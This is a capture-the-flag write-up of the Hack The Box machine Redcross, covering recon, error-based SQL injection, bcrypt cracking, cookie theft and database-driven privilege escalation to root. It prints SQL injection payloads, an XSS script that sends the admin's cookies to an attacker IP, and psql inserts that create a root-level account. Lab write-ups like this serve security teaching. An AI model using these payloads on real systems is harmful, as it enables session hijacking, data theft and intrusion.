Redcross writeup Summery
This Writeup is about Redcross on hack the box. It was a Linux box. It starts off with web exploitation via xss on admin stealing his cookies to login to the admin panel. Than command injection in the firewall to get a shell as www-data after recon we find the password to the database which creates users. we create user with uid 0 and then go back in as that user enumerate more to get root password on the database we log in as root and create a root user on the box su as that user and we get root.
I did a Nmap scan and I found port 80,443 and port 22 was open and there was’nt much information in the results for port 443 we see that there is a subdomain.
Its called https://intra.redcross.htb and that’s all there is. we don’t find much in this Nmap scan.
So let’s look up our Nmap results.
Nmap scan report for redcross.htb (10.10.10.113) Host is up (0.51s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0) | ssh-hostkey: | 2048 67:d3:85:f8:ee:b8:06:23:59:d7:75:8e:a2:37:d0:a6 (RSA) | 256 89:b4:65:27:1f:93:72:1a:bc:e3:22:70:90:db:35:96 (ECDSA) |_ 256 66:bd:a1:1c:32:74:32:e2:e6:64:e8:a5:25:1b:4d:67 (ED25519) 80/tcp open http Apache httpd 2.4.25 |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Did not follow redirect to https://intra.redcross.htb/ 443/tcp open ssl/http Apache httpd 2.4.25 |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Did not follow redirect to https://intra.redcross.htb/ | ssl-cert: Subject: commonName=intra.redcross.htb/organizationName=Red Cross International/stateOrProvinceName=NY/countryName=US | Not valid before: 2018-06-03T19:46:58 |_Not valid after: 2021-02-27T19:46:58 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
I added the subdomain and domain to my etc/hosts file and started to enumerate the SSL certificate on intra.redcross.htb. After this, I started my background recon before starting to look at the web portion of this machine.
First I started gobuster on intra.redcorss.htb it found some directories. Documentation directory sounded really interesting so I started another gobuster to scan for all the pdf and txt files to dir bust. we found account-signup.pdf which has instructions to sign up with a new account.
Intra.redcross.htb also suggested that there might be other subdomains so I started wfuzz to scan for subdomains.
wfuzz -H 'Host: FUZZ.redcross.htb' -u 'https://10.10.10.113' -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt --hw 28 ******************************************************** * Wfuzz 2.4 - The Web Fuzzer * ******************************************************** Target: https://10.10.10.113/ Total requests: 484700 =================================================================== ID Response Lines Word Chars Payload =================================================================== 000000071: 302 0 L 18 W 363 Ch "admin" Finishing pending requests...
and we found a subdomain called admin.redcross.com i added that to our host file as well. I looked at it but left it as we had found a way to sign up.
So we go to that link mentioned and we do as it says. I tried to sign up a user but it just gave me temporary credentials guest:guest. So I went and logged in as a guest. There was not much on the page except the filter field so I tried adding a single quote after 1 and we got a SQL Error I thought this was a SQL Injection so I tried several things and there was no output. So I tried to find a way to extract data in the error itself thankfully extractvalue() function in SQL lets us do an Xpath injection to extract data in the error itself.
'5' or dest like '1'') LIMIT 10' '5' or dest like '<injection>') LIMIT 10' assumption - select message from table where (message like '5' or dest like '<injection>') LIMIT 10' 1')-- - select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,version())-- - !!') LIMIT 10' to get the version of the db in error message select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,concat(0x0a,(select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA LIMIT 1)))-- - !!') LIMIT 10' to extract DB names select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,concat(0x0a,(select SCHEMA_NAME from INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1)))-- - !!') LIMIT 10' --dbname redcross To extract Table names select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,concat(0x0a,(select TABLE_NAME from INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA like "redcross" LIMIT 1,1)))-- - !!') LIMIT 10' -- tables: messages, requests, users To extract Column names select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,concat(0x0a,(select COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME like "users" LIMIT 0,1)))-- - !!') LIMIT 10' --COLUMNS id, username, password, mail, role to extract usernames:- select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,concat(0x0a,(select username from users LIMIT 0,1)))-- - !!') LIMIT 10' --usernames admin, penelope charles tricia guest to extract passwords select message from table where (message like '5' or dest like '!! ') and extractvalue(0x0a,concat(0x0a,substring((select password from redcross.users LIMIT 0,1) from 1)))-- - !!') LIMIT 10' --passwords admin:$2y$10$z/d5GiwZuFqjY1jRiKIPzuPXKt0SthLOyU438ajqRBtrb7ZADpwq. penelope:$2y$10$tY9Y955kyFB37GnW4xrC0.J.FzmkrQhxD..vKCQICvwOEgwfxqgAS charles:$2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i tricia:$2y$10$Dnv/b2ZBca2O4cp0fsBbjeQ/0HnhvJ7WrC/ZN3K7QKqTa9SSKP6r. guest:$2y$10$U16O2Ylt/uFtzlVbDIzJ8us9ts8f9ITWoPAWcUfK585sZue03YBAi
In the file above between the !! signs is the injected code closed with another two !! and the notes helped me keep track of the data I have extracted already.
This is how i got all the user names and password hashes and usernames.I used hashcat to crack these hashes and we found that password for user charles is cookiemonster.
[email protected]:~ hashcat --example-hashes | grep 3200 -A 3 -- MODE: 3200 TYPE: bcrypt $2*$, Blowfish (Unix) HASH: $2a$05$MBCzKhG1KhezLh.0LRa0Kuw12nLJtpHy6DIaU.JAnqJUDYspHC.Ou PASS: hashcat -- hashcat -m 3200 -O /root/Desktop/HackTheBox-Machines/Redcross/redcross.users /usr/share/wordlists/rockyou.txt --user --force $2y$10$bj5Qh0AbUM5wHeu/lTfjg.xPxjRQkqU6T8cs683Eus/Y89GHs.G7i:cookiemonster Session..........: hashcat Status...........: Exhausted Hash.Type........: bcrypt $2*$, Blowfish (Unix) Hash.Target......: /root/Desktop/HackTheBox-Machines/Redcross/redcross.users Time.Started.....: Sun Apr 26 03:48:28 2020 (1 sec) Time.Estimated...: Sun Apr 26 03:48:29 2020 (0 secs) Guess.Base.......: File (cheatlist) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 3 H/s (0.13ms) @ Accel:4 Loops:2 Thr:8 Vec:8 Recovered........: 1/5 (20.00%) Digests, 1/5 (20.00%) Salts Progress.........: 5/5 (100.00%) Rejected.........: 0/5 (0.00%) Restore.Point....: 1/1 (100.00%) Restore.Sub.#1...: Salt:4 Amplifier:0-1 Iteration:1022-1024 Candidates.#1....: cookiemonster -> cookiemonster
So I logged in as Charles and found messages on his dashboard about some problem with the admin website. Which is suggesting there is some cross-site scripting attack. It says alerts popping everywhere so I assumed that maybe there is a simulated admin user and we have to do an XSS attack steal his cookies and get admin on the web.
Also in the last message charles said that he fixed the contact form so may be there is a simulated user who creates the user account by reading stuff submitted in contact form.
<script>document.write('<img src="https://10.10.14.8/collect.gif?cookie=' + document.cookie + '" />')</script>
If we can get his cookies maybe we can steal his session. So i tried different combinations but all filed at last i tried to put a script tag in number field of the form and we got the admin cookies.
Replacing my cookies with admins cookie i got access to the dashboard.
Here we have a firewall and user management I added a user in user management and we got an ssh user with its password. When I logged in that user i found that this was a restricted chroot shell where we don’t even have complete filesystem of Linux.
Now after not getting anywhere with that shell I went and explored the firewall link for a while. If you whitelist your IP in the firewall it’ll show you more ports open but I didn’t find anything much interesting. I assumed that this is running IP tables command on the backend judging from the output and input and I tried doing command injection. Found command injection in denying function of the firewall. And got a shell as a www-data user in the box.
Redcross writeup: User
Now i started doing recon and found that actions.php file had database password and username in it for the user unixusermgr which sounded like the database which was creating users before when we created our test user earlier in the user manager. So I logged in to the psql shell using those creds and found the users we just made.
I used /d to get all the tables and in it there was a passwd_table which had these user accounts.
unix=> \d List of relations Schema | Name | Type | Owner --------+--------------+----------+---------- public | group_id | sequence | postgres public | group_table | table | postgres public | passwd_table | table | postgres public | shadow_table | table | postgres public | user_id | sequence | postgres public | usergroups | table | postgres unix=> select * from passwd_table; username | passwd | uid | gid | gecos | homedir | shell ----------+------------------------------------+------+------+-------+----------------+----------- tricia | $1$WFsH/kvS$5gAjMYSvbpZFNu//uMPmp. | 2018 | 1001 | | /var/jail/home | /bin/bash ipp | $1$gQ7x90wK$ym3DyPEksCS/06VBUESpJ. | 2020 | 0 | | / | /bin/bash batman | $1$gQ7x90wK$ym3DyPEksCS/06VBUESpJ. | 0 | 0 | | / | /bin/bash bugs | $1$KkZCHcOx$7DhQiKjOAiGlBOTvxZdVt0 | 2023 | 1001 | | /var/jail/home | /bin/bash (4 rows) unix=> \dp Access privileges Schema | Name | Type | Access privileges | Column privileges | Policies --------+--------------+----------+------------------------------+--------------------------+---------- public | group_id | sequence | | | public | group_table | table | postgres=arwdDxt/postgres +| | | | | unixnss=r/postgres | | public | passwd_table | table | postgres=arwdDxt/postgres +| username: +| | | | unixnss=r/postgres +| unixusrmgr=aw/postgres+| | | | unixusrmgr=rd/postgres +| passwd: +| | | | unixnssroot=arwdDxt/postgres | unixusrmgr=aw/postgres+| | | | | gid: +| | | | | unixusrmgr=aw/postgres+| unix=> insert into passwd_table (username,passwd,gid,homedir) values('spiderman','$1$gQ7x90wK$ym3DyPEksCS/06VBUESpJ.',0,'/'); INSERT 0 1
We had fields like username passwd,uid,gid,homedir. So I tried to create a user with elevated privileges but it failed as I didn’t have permission to create a user with uid’s. I created a user with gid of 0 which will give us higher privileges than www-data by adding the user to the root group.\
Redcross writeup : Root
now I sshed in as the user spiderman and ran
linenum.sh to find out that there is a file called nss-pgsql-root.conf in the /etc folder I did an ls -ltr to see the latest modified files and this looked interesting. It had psql root credentials.
Now i logged in the db and used my previous command to add a user as root.
insert into passwd_table (username,passwd,uid,gid,homedir) values('batman','$1$gQ7x90wK$ym3DyPEksCS/06VBUESpJ.',0,0,'/');
and it got added successfully so now i tried to ssh with this user and its password but it didnt work so maybe ssh from root user is blocked i tried to do a su batman with my password and i logged in as root.
If you liked this write-up or have any questions please leave a comment below thanks for reading 🙂 .Check out my other write-ups enterprise was my own favorite.